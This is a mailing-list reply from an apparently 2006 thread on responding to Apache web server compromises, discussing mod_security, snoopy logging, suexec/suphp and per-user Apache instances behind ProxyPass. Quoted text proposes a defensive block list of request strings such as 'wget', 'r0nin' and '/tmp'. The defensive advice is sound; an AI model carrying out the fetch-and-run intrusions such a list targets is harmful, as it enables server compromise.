Michael Loftis wrote: > > > --On April 7, 2006 10:57:22 PM +0100 Steve Kemp <skx@debian.org> wrote: > >> That is an appalling approach to dealing with the problem, especially >> if you have an old kernel which could allow privilege escalation. >> >> There are several approaches to actually tracking down the source >> of the problem. The most obvious is to use the mod_security >> module for Apache to log incoming payloads and ban requests containing >> strings such as 'wget', 'r0nin', '/tmp', etc. >> >> Another approach would be to install 'snoopy', or similar, to log >> *every* executed script upon a host and then walk backwards from the >> initial intrusion to the execution of the script. > > > Another one is ti use mod_security from modsecurity.org. This helps > prevent stupid customers from getting your insecure system infected. > Better still to use suphp or suexec so things don't run as www-data and > run as their own users. > Running apache on a high port and using ProxyPass and ProxyPassReverse accomplishes the same, correct? I like that solution becuase then each user can choose apache1.3 or apache2 and load/unload whatever modules he/she likes. -Roberto -- Roberto C. Sanchez http://familiasanchez.net/~roberto
Attachment:
signature.asc
Description: OpenPGP digital signature